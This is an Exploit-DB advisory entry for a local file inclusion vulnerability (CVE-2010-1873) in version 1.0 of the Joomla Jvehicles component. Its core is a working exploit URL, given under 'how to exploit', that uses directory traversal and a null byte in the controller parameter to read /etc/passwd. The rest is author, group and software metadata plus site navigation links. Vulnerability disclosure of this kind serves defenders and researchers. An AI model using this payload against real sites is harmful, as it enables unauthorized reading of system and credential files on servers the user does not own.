Joomla! Component Jvehicles - Local File Inclusion

EDB-ID:

11997

CVE:

2010-1873

EDB Verified:

Author:

Chip d3 bi0s

Type:

webapps

Exploit: /

Platform:

PHP

Date:

2010-04-01

Vulnerable App:

---------------------------------------------------------------------------------
Joomla Component Jvehicles Local File Inclusion
---------------------------------------------------------------------------------

Author		: Chip D3 Bi0s
Group		: LatinHackTeam
Email & msn	: chipdebios@gmail.com
Date		: 31 March 2010
Critical Lvl	: Moderate
Impact		: Exposure of sensitive information
Where		: From Remote
---------------------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~


Application	: Jvehicles
version		: 1.0
Developer	: este8an
License		: GPL            type  : Non-Commercial
Date Added	: 5 May 2009
Download	: http://www.jvehicles.com/index.php?option=com_remository&Itemid=6&func=select&id=2&orderby=3&#9001;=en




Description     :

Derivation of a popular component com_properties (for Estate Agent) .
This component is to manage vehicles. With the same functionality.


--------------
file error	: components/com_jvehicles/jvehicles.php

how to exploit

http://127.0.0.1/index.php?option=com_jvehicles&controller=../../../../../../../../../../etc/passwd%00

------------------------


+++++++++++++++++++++++++++++++++++++++
[!] Produced in South America
+++++++++++++++++++++++++++++++++++++++

Tags:

Advisory/Source: Link

Databases	Links	Sites	Solutions
Exploits	Search Exploit-DB	OffSec	Courses and Certifications
Google Hacking	Submit Entry	Kali Linux	Learn Subscriptions
Papers	SearchSploit Manual	VulnHub	OffSec Cyber Range
Shellcodes	Exploit Statistics		Proving Grounds
			Penetration Testing Services